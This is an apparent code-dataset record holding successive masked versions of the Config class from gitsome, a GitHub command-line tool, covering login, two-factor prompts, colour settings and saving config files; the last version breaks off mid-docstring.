{ "blob_id": "a649139a600cb506056a20e00089a07ec9244394", "index": 858, "step-1": "<mask token>\n\n\nclass Config(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def _init_colors(self):\n \"\"\"Initialize colors to their defaults.\"\"\"\n self.clr_primary = None\n self.clr_secondary = 'green'\n self.clr_tertiary = 'cyan'\n self.clr_quaternary = 'yellow'\n self.clr_bold = 'cyan'\n self.clr_code = 'cyan'\n self.clr_error = 'red'\n self.clr_header = 'yellow'\n self.clr_link = 'green'\n self.clr_list = 'cyan'\n self.clr_message = None\n self.clr_num_comments = 'green'\n self.clr_num_points = 'green'\n self.clr_tag = 'cyan'\n self.clr_time = 'yellow'\n self.clr_title = None\n self.clr_tooltip = None\n self.clr_user = 'cyan'\n self.clr_view_link = 'magenta'\n self.clr_view_index = 'magenta'\n <mask token>\n\n def authenticate(self, enterprise=False, enterprise_auth=\n enterprise_login, overwrite=False):\n \"\"\"Log into GitHub.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type enterprise: bool\n :param enterprise: Determines whether to configure GitHub Enterprise.\n Default: False.\n\n :type overwrite: bool\n :param overwrite: indicates whether we cant to overwrite the current\n set of credentials. Default: False.\n \"\"\"\n if self.api is not None and not overwrite:\n return\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n if os.path.isfile(config) and os.access(config, os.R_OK | os.W_OK\n ) and not overwrite:\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n self.authenticate_cached_credentials(config, parser)\n else:\n login_kwargs = {'two_factor_callback': self.request_two_factor_code\n }\n if enterprise:\n self.login = enterprise_auth\n while not self.enterprise_url:\n self.enterprise_url = input('Enterprise URL: ')\n if click.confirm('Do you want to verify SSL certs?',\n default=True):\n self.verify_ssl = True\n else:\n self.verify_ssl = False\n login_kwargs.update({'url': self.enterprise_url, 'verify':\n self.verify_ssl})\n while not self.user_login:\n self.user_login = input('User Login: ')\n login_kwargs.update({'username': self.user_login})\n if click.confirm(\n 'Do you want to log in with a password [Y] or a personal access token [n]?'\n , default=True):\n user_pass = None\n while not user_pass:\n user_pass = self.getpass('Password: ')\n login_kwargs.update({'password': user_pass})\n try:\n if not enterprise:\n auth = self.authorize(self.user_login, user_pass,\n scopes=['user', 'repo'], note='gitsome',\n note_url=\n 'https://github.com/donnemartin/gitsome',\n two_factor_callback=self.request_two_factor_code)\n self.user_token = auth.token\n else:\n self.user_pass = user_pass\n except (UnprocessableEntity, AuthenticationFailed):\n click.secho('Error creating token.', fg=self.clr_error)\n click.secho(\n \"\"\"Visit the following page and verify you do not have an existing token named \"gitsome\":\n https://github.com/settings/tokens\nIf a token already exists, update your ~/.gitsomeconfig file with your token:\n user_token = TOKEN\nYou can also generate a new token.\"\"\"\n , fg=self.clr_message)\n self.print_auth_error()\n return\n else:\n while not self.user_token:\n self.user_token = input('Token: ')\n login_kwargs.update({'token': self.user_token})\n self.api = self.login(**login_kwargs)\n if self.user_feed:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self\n .user_feed)\n\n def check_auth(self):\n \"\"\"Check if the current authorization is valid.\n\n This method uses the ratelimit_remaining api to check whether\n the currently authenticated user's credentials are valid without\n deducting from the rate limit. The ratelimit_remaining api does not\n seem to be available for GitHub Enterprise.\n\n github3.py's method check_authorization seems to only work given\n an authorization created by a registered application.\n\n TODO: Determine a better way to check the authorization for\n GitHub Enterprise.\n\n :type enterprise: bool\n :param enterprise: Determines whether we are authenticating with\n GitHub Enterprise.\n \"\"\"\n if self.enterprise_url is not None:\n return True\n try:\n if self.api is not None:\n self.api.ratelimit_remaining\n return True\n else:\n self.print_auth_error()\n except AuthenticationFailed:\n self.print_auth_error()\n return False\n\n def get_github_config_path(self, config_file_name):\n \"\"\"Attempt to find the github config file.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type config_file_name: str\n :param config_file_name: The config file name.\n\n :rtype: str\n :return: The github config file path.\n \"\"\"\n home = os.path.abspath(os.environ.get('HOME', ''))\n config_file_path = os.path.join(home, config_file_name)\n return config_file_path\n <mask token>\n\n def load_configs(self, config_funcs):\n \"\"\"Load the specified config from ~/.gitsomeconfig.\n\n :type foo: list\n :param foo: The config methods to run.\n \"\"\"\n config_file_path = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n try:\n with open(config_file_path) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n for config_func in config_funcs:\n config_func(parser)\n except IOError:\n return None\n\n def load_config_colors(self, parser):\n \"\"\"Load the color config from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.load_colors(parser)\n\n def load_colors(self, parser):\n \"\"\"Load all colors from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.clr_primary = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_PRIMARY, default=self.clr_primary, color_config=True)\n self.clr_secondary = self.load_config(parser=parser, cfg_label=self\n .CONFIG_CLR_SECONDARY, default=self.clr_secondary, color_config\n =True)\n self.clr_tertiary = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TERTIARY, default=self.clr_tertiary, color_config=True)\n self.clr_quaternary = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_QUATERNARY, default=self.clr_quaternary,\n color_config=True)\n self.clr_bold = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_BOLD, default=self.clr_bold, color_config=True)\n self.clr_code = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_CODE, default=self.clr_code, color_config=True)\n self.clr_code = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_ERROR, default=self.clr_code, color_config=True)\n self.clr_header = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_HEADER, default=self.clr_header, color_config=True)\n self.clr_link = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_LINK, default=self.clr_link, color_config=True)\n self.clr_list = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_LIST, default=self.clr_list, color_config=True)\n self.clr_message = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_MESSAGE, default=self.clr_message, color_config=True)\n self.clr_num_comments = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_NUM_COMMENTS, default=self.clr_num_comments,\n color_config=True)\n self.clr_num_points = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_NUM_POINTS, default=self.clr_num_points,\n color_config=True)\n self.clr_tag = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TAG, default=self.clr_tag, color_config=True)\n self.clr_time = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TIME, default=self.clr_time, color_config=True)\n self.clr_title = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TITLE, default=self.clr_title, color_config=True)\n self.clr_tooltip = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TOOLTIP, default=self.clr_tooltip, color_config=True)\n self.clr_user = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_USER, default=self.clr_user, color_config=True)\n self.clr_view_link = self.load_config(parser=parser, cfg_label=self\n .CONFIG_CLR_VIEW_LINK, default=self.clr_view_link, color_config\n =True)\n self.clr_view_index = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_VIEW_INDEX, default=self.clr_view_index,\n color_config=True)\n\n def load_urls(self, view_in_browser):\n \"\"\"Load the current set of urls from ~/.gitsomeconfigurl.\n\n :type view_in_browser: bool\n :param view_in_browser: Determines whether to view the urls in a\n browser.\n\n :rtype: list\n :return: Collection of urls.\n \"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n urls = parser.get(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST)\n urls = urls.strip()\n excludes = ['[', ']', \"'\"]\n for exclude in excludes:\n urls = urls.replace(exclude, '')\n if not view_in_browser:\n urls = urls.replace('https://github.com/', '')\n return urls.split(', ')\n\n def print_auth_error(self):\n \"\"\"Print a message the authorization has failed.\"\"\"\n click.secho('Authentication error.', fg=self.clr_error)\n click.secho(\n 'Update your credentials in ~/.gitsomeconfig or run:\\n gh configure'\n , fg=self.clr_message)\n <mask token>\n\n def request_two_factor_code(self):\n \"\"\"Request two factor authentication code.\n\n Callback if two factor authentication is requested.\n\n :rtype: str\n :return: The user input two factor authentication code.\n \"\"\"\n code = ''\n while not code:\n code = input('Enter 2FA code: ')\n return code\n\n def save_config(self):\n \"\"\"Saves the config to ~/.gitsomeconfig.\"\"\"\n if self.check_auth():\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n parser.add_section(self.CONFIG_SECTION)\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_LOGIN, self.\n user_login)\n if self.user_token is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_TOKEN,\n self.user_token)\n if self.user_feed is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self\n .user_feed)\n if self.enterprise_url is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_ENTERPRISE_URL,\n self.enterprise_url)\n if self.user_pass is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_PASS,\n self.user_pass)\n else:\n parser.remove_option(self.CONFIG_SECTION, self.CONFIG_USER_PASS\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_VERIFY_SSL, self.\n verify_ssl)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_PRIMARY, self.\n clr_primary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_SECONDARY, self\n .clr_secondary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TERTIARY, self.\n clr_tertiary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_QUATERNARY,\n self.clr_quaternary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_BOLD, self.clr_bold\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_CODE, self.clr_code\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_ERROR, self.\n clr_error)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_HEADER, self.\n clr_header)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LINK, self.clr_link\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LIST, self.clr_list\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_MESSAGE, self.\n clr_message)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_COMMENTS,\n self.clr_num_comments)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_POINTS,\n self.clr_num_points)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TAG, self.clr_tag)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TIME, self.clr_time\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TITLE, self.\n clr_title)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TOOLTIP, self.\n clr_tooltip)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_USER, self.clr_user\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_LINK, self\n .clr_view_link)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_INDEX,\n self.clr_view_index)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n\n def save_urls(self):\n \"\"\"Save the current set of urls to ~/.gitsomeconfigurl.\"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n try:\n parser.add_section(self.CONFIG_URL_SECTION)\n except configparser.DuplicateSectionError:\n pass\n parser.set(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST, self.urls)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Config(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n self.api = None\n self.user_login = None\n self.user_pass = None\n self.user_token = None\n self.user_feed = None\n self.enterprise_url = None\n self.verify_ssl = True\n self.urls = []\n self._init_colors()\n self.load_configs([self.load_config_colors])\n self.login = login\n self.authorize = authorize\n self.getpass = getpass\n\n def _init_colors(self):\n \"\"\"Initialize colors to their defaults.\"\"\"\n self.clr_primary = None\n self.clr_secondary = 'green'\n self.clr_tertiary = 'cyan'\n self.clr_quaternary = 'yellow'\n self.clr_bold = 'cyan'\n self.clr_code = 'cyan'\n self.clr_error = 'red'\n self.clr_header = 'yellow'\n self.clr_link = 'green'\n self.clr_list = 'cyan'\n self.clr_message = None\n self.clr_num_comments = 'green'\n self.clr_num_points = 'green'\n self.clr_tag = 'cyan'\n self.clr_time = 'yellow'\n self.clr_title = None\n self.clr_tooltip = None\n self.clr_user = 'cyan'\n self.clr_view_link = 'magenta'\n self.clr_view_index = 'magenta'\n <mask token>\n\n def authenticate(self, enterprise=False, enterprise_auth=\n enterprise_login, overwrite=False):\n \"\"\"Log into GitHub.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type enterprise: bool\n :param enterprise: Determines whether to configure GitHub Enterprise.\n Default: False.\n\n :type overwrite: bool\n :param overwrite: indicates whether we cant to overwrite the current\n set of credentials. Default: False.\n \"\"\"\n if self.api is not None and not overwrite:\n return\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n if os.path.isfile(config) and os.access(config, os.R_OK | os.W_OK\n ) and not overwrite:\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n self.authenticate_cached_credentials(config, parser)\n else:\n login_kwargs = {'two_factor_callback': self.request_two_factor_code\n }\n if enterprise:\n self.login = enterprise_auth\n while not self.enterprise_url:\n self.enterprise_url = input('Enterprise URL: ')\n if click.confirm('Do you want to verify SSL certs?',\n default=True):\n self.verify_ssl = True\n else:\n self.verify_ssl = False\n login_kwargs.update({'url': self.enterprise_url, 'verify':\n self.verify_ssl})\n while not self.user_login:\n self.user_login = input('User Login: ')\n login_kwargs.update({'username': self.user_login})\n if click.confirm(\n 'Do you want to log in with a password [Y] or a personal access token [n]?'\n , default=True):\n user_pass = None\n while not user_pass:\n user_pass = self.getpass('Password: ')\n login_kwargs.update({'password': user_pass})\n try:\n if not enterprise:\n auth = self.authorize(self.user_login, user_pass,\n scopes=['user', 'repo'], note='gitsome',\n note_url=\n 'https://github.com/donnemartin/gitsome',\n two_factor_callback=self.request_two_factor_code)\n self.user_token = auth.token\n else:\n self.user_pass = user_pass\n except (UnprocessableEntity, AuthenticationFailed):\n click.secho('Error creating token.', fg=self.clr_error)\n click.secho(\n \"\"\"Visit the following page and verify you do not have an existing token named \"gitsome\":\n https://github.com/settings/tokens\nIf a token already exists, update your ~/.gitsomeconfig file with your token:\n user_token = TOKEN\nYou can also generate a new token.\"\"\"\n , fg=self.clr_message)\n self.print_auth_error()\n return\n else:\n while not self.user_token:\n self.user_token = input('Token: ')\n login_kwargs.update({'token': self.user_token})\n self.api = self.login(**login_kwargs)\n if self.user_feed:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self\n .user_feed)\n\n def check_auth(self):\n \"\"\"Check if the current authorization is valid.\n\n This method uses the ratelimit_remaining api to check whether\n the currently authenticated user's credentials are valid without\n deducting from the rate limit. The ratelimit_remaining api does not\n seem to be available for GitHub Enterprise.\n\n github3.py's method check_authorization seems to only work given\n an authorization created by a registered application.\n\n TODO: Determine a better way to check the authorization for\n GitHub Enterprise.\n\n :type enterprise: bool\n :param enterprise: Determines whether we are authenticating with\n GitHub Enterprise.\n \"\"\"\n if self.enterprise_url is not None:\n return True\n try:\n if self.api is not None:\n self.api.ratelimit_remaining\n return True\n else:\n self.print_auth_error()\n except AuthenticationFailed:\n self.print_auth_error()\n return False\n\n def get_github_config_path(self, config_file_name):\n \"\"\"Attempt to find the github config file.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type config_file_name: str\n :param config_file_name: The config file name.\n\n :rtype: str\n :return: The github config file path.\n \"\"\"\n home = os.path.abspath(os.environ.get('HOME', ''))\n config_file_path = os.path.join(home, config_file_name)\n return config_file_path\n <mask token>\n\n def load_configs(self, config_funcs):\n \"\"\"Load the specified config from ~/.gitsomeconfig.\n\n :type foo: list\n :param foo: The config methods to run.\n \"\"\"\n config_file_path = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n try:\n with open(config_file_path) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n for config_func in config_funcs:\n config_func(parser)\n except IOError:\n return None\n\n def load_config_colors(self, parser):\n \"\"\"Load the color config from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.load_colors(parser)\n\n def load_colors(self, parser):\n \"\"\"Load all colors from ~/.gitsomeconfig.\n\n :type parser: :class:`ConfigParser.RawConfigParser`\n :param parser: An instance of `ConfigParser.RawConfigParser`.\n \"\"\"\n self.clr_primary = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_PRIMARY, default=self.clr_primary, color_config=True)\n self.clr_secondary = self.load_config(parser=parser, cfg_label=self\n .CONFIG_CLR_SECONDARY, default=self.clr_secondary, color_config\n =True)\n self.clr_tertiary = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TERTIARY, default=self.clr_tertiary, color_config=True)\n self.clr_quaternary = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_QUATERNARY, default=self.clr_quaternary,\n color_config=True)\n self.clr_bold = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_BOLD, default=self.clr_bold, color_config=True)\n self.clr_code = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_CODE, default=self.clr_code, color_config=True)\n self.clr_code = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_ERROR, default=self.clr_code, color_config=True)\n self.clr_header = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_HEADER, default=self.clr_header, color_config=True)\n self.clr_link = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_LINK, default=self.clr_link, color_config=True)\n self.clr_list = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_LIST, default=self.clr_list, color_config=True)\n self.clr_message = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_MESSAGE, default=self.clr_message, color_config=True)\n self.clr_num_comments = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_NUM_COMMENTS, default=self.clr_num_comments,\n color_config=True)\n self.clr_num_points = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_NUM_POINTS, default=self.clr_num_points,\n color_config=True)\n self.clr_tag = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TAG, default=self.clr_tag, color_config=True)\n self.clr_time = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TIME, default=self.clr_time, color_config=True)\n self.clr_title = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TITLE, default=self.clr_title, color_config=True)\n self.clr_tooltip = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_TOOLTIP, default=self.clr_tooltip, color_config=True)\n self.clr_user = self.load_config(parser=parser, cfg_label=self.\n CONFIG_CLR_USER, default=self.clr_user, color_config=True)\n self.clr_view_link = self.load_config(parser=parser, cfg_label=self\n .CONFIG_CLR_VIEW_LINK, default=self.clr_view_link, color_config\n =True)\n self.clr_view_index = self.load_config(parser=parser, cfg_label=\n self.CONFIG_CLR_VIEW_INDEX, default=self.clr_view_index,\n color_config=True)\n\n def load_urls(self, view_in_browser):\n \"\"\"Load the current set of urls from ~/.gitsomeconfigurl.\n\n :type view_in_browser: bool\n :param view_in_browser: Determines whether to view the urls in a\n browser.\n\n :rtype: list\n :return: Collection of urls.\n \"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n urls = parser.get(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST)\n urls = urls.strip()\n excludes = ['[', ']', \"'\"]\n for exclude in excludes:\n urls = urls.replace(exclude, '')\n if not view_in_browser:\n urls = urls.replace('https://github.com/', '')\n return urls.split(', ')\n\n def print_auth_error(self):\n \"\"\"Print a message the authorization has failed.\"\"\"\n click.secho('Authentication error.', fg=self.clr_error)\n click.secho(\n 'Update your credentials in ~/.gitsomeconfig or run:\\n gh configure'\n , fg=self.clr_message)\n\n def prompt_news_feed(self):\n \"\"\"Prompt the user to enter a news feed url.\"\"\"\n if click.confirm(\n \"\"\"No feed url detected.\n Calling gh events without an argument\n displays the logged in user's news feed.\nDo you want gitsome to track your news feed?\"\"\"\n , default=True):\n click.secho(\n \"\"\"Visit the following url while logged into GitHub:\n https://github.com\nEnter the url found under \"Subscribe to your news feed\".\"\"\"\n , fg=self.clr_message)\n self.user_feed = ''\n while not self.user_feed:\n self.user_feed = input('URL: ')\n\n def request_two_factor_code(self):\n \"\"\"Request two factor authentication code.\n\n Callback if two factor authentication is requested.\n\n :rtype: str\n :return: The user input two factor authentication code.\n \"\"\"\n code = ''\n while not code:\n code = input('Enter 2FA code: ')\n return code\n\n def save_config(self):\n \"\"\"Saves the config to ~/.gitsomeconfig.\"\"\"\n if self.check_auth():\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n parser.add_section(self.CONFIG_SECTION)\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_LOGIN, self.\n user_login)\n if self.user_token is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_TOKEN,\n self.user_token)\n if self.user_feed is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self\n .user_feed)\n if self.enterprise_url is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_ENTERPRISE_URL,\n self.enterprise_url)\n if self.user_pass is not None:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_PASS,\n self.user_pass)\n else:\n parser.remove_option(self.CONFIG_SECTION, self.CONFIG_USER_PASS\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_VERIFY_SSL, self.\n verify_ssl)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_PRIMARY, self.\n clr_primary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_SECONDARY, self\n .clr_secondary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TERTIARY, self.\n clr_tertiary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_QUATERNARY,\n self.clr_quaternary)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_BOLD, self.clr_bold\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_CODE, self.clr_code\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_ERROR, self.\n clr_error)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_HEADER, self.\n clr_header)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LINK, self.clr_link\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_LIST, self.clr_list\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_MESSAGE, self.\n clr_message)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_COMMENTS,\n self.clr_num_comments)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_NUM_POINTS,\n self.clr_num_points)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TAG, self.clr_tag)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TIME, self.clr_time\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TITLE, self.\n clr_title)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_TOOLTIP, self.\n clr_tooltip)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_USER, self.clr_user\n )\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_LINK, self\n .clr_view_link)\n parser.set(self.CONFIG_SECTION, self.CONFIG_CLR_VIEW_INDEX,\n self.clr_view_index)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n\n def save_urls(self):\n \"\"\"Save the current set of urls to ~/.gitsomeconfigurl.\"\"\"\n config = self.get_github_config_path(self.CONFIG_URL)\n parser = configparser.RawConfigParser()\n try:\n parser.add_section(self.CONFIG_URL_SECTION)\n except configparser.DuplicateSectionError:\n pass\n parser.set(self.CONFIG_URL_SECTION, self.CONFIG_URL_LIST, self.urls)\n with open(config, 'w+') as config_file:\n parser.write(config_file)\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Config(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self):\n self.api = None\n self.user_login = None\n self.user_pass = None\n self.user_token = None\n self.user_feed = None\n self.enterprise_url = None\n self.verify_ssl = True\n self.urls = []\n self._init_colors()\n self.load_configs([self.load_config_colors])\n self.login = login\n self.authorize = authorize\n self.getpass = getpass\n\n def _init_colors(self):\n \"\"\"Initialize colors to their defaults.\"\"\"\n self.clr_primary = None\n self.clr_secondary = 'green'\n self.clr_tertiary = 'cyan'\n self.clr_quaternary = 'yellow'\n self.clr_bold = 'cyan'\n self.clr_code = 'cyan'\n self.clr_error = 'red'\n self.clr_header = 'yellow'\n self.clr_link = 'green'\n self.clr_list = 'cyan'\n self.clr_message = None\n self.clr_num_comments = 'green'\n self.clr_num_points = 'green'\n self.clr_tag = 'cyan'\n self.clr_time = 'yellow'\n self.clr_title = None\n self.clr_tooltip = None\n self.clr_user = 'cyan'\n self.clr_view_link = 'magenta'\n self.clr_view_index = 'magenta'\n <mask token>\n\n def authenticate(self, enterprise=False, enterprise_auth=\n enterprise_login, overwrite=False):\n \"\"\"Log into GitHub.\n\n Adapted from https://github.com/sigmavirus24/github-cli.\n\n :type enterprise: bool\n :param enterprise: Determines whether to configure GitHub Enterprise.\n Default: False.\n\n :type overwrite: bool\n :param overwrite: indicates whether we cant to overwrite the current\n set of credentials. Default: False.\n \"\"\"\n if self.api is not None and not overwrite:\n return\n config = self.get_github_config_path(self.CONFIG)\n parser = configparser.RawConfigParser()\n if os.path.isfile(config) and os.access(config, os.R_OK | os.W_OK\n ) and not overwrite:\n with open(config) as config_file:\n try:\n parser.read_file(config_file)\n except AttributeError:\n parser.readfp(config_file)\n self.authenticate_cached_credentials(config, parser)\n else:\n login_kwargs = {'two_factor_callback': self.request_two_factor_code\n }\n if enterprise:\n self.login = enterprise_auth\n while not self.enterprise_url:\n self.enterprise_url = input('Enterprise URL: ')\n if click.confirm('Do you want to verify SSL certs?',\n default=True):\n self.verify_ssl = True\n else:\n self.verify_ssl = False\n login_kwargs.update({'url': self.enterprise_url, 'verify':\n self.verify_ssl})\n while not self.user_login:\n self.user_login = input('User Login: ')\n login_kwargs.update({'username': self.user_login})\n if click.confirm(\n 'Do you want to log in with a password [Y] or a personal access token [n]?'\n , default=True):\n user_pass = None\n while not user_pass:\n user_pass = self.getpass('Password: ')\n login_kwargs.update({'password': user_pass})\n try:\n if not enterprise:\n auth = self.authorize(self.user_login, user_pass,\n scopes=['user', 'repo'], note='gitsome',\n note_url=\n 'https://github.com/donnemartin/gitsome',\n two_factor_callback=self.request_two_factor_code)\n self.user_token = auth.token\n else:\n self.user_pass = user_pass\n except (UnprocessableEntity, AuthenticationFailed):\n click.secho('Error creating token.', fg=self.clr_error)\n click.secho(\n \"\"\"Visit the following page and verify you do not have an existing token named \"gitsome\":\n https://github.com/settings/tokens\nIf a token already exists, update your ~/.gitsomeconfig file with your token:\n user_token = TOKEN\nYou can also generate a new token.\"\"\"\n , fg=self.clr_message)\n self.print_auth_error()\n return\n else:\n while not self.user_token:\n self.user_token = input('Token: ')\n login_kwargs.update({'token': self.user_token})\n self.api = self.login(**login_kwargs)\n if self.user_feed:\n parser.set(self.CONFIG_SECTION, self.CONFIG_USER_FEED, self\n .user_feed)\n\n def check_auth(self):\n \"\"\"Check if the current authorization is valid.\n\n This method uses the ratelimit_remaining api to check whether\n the currently authenticated user's credentials are valid without\n 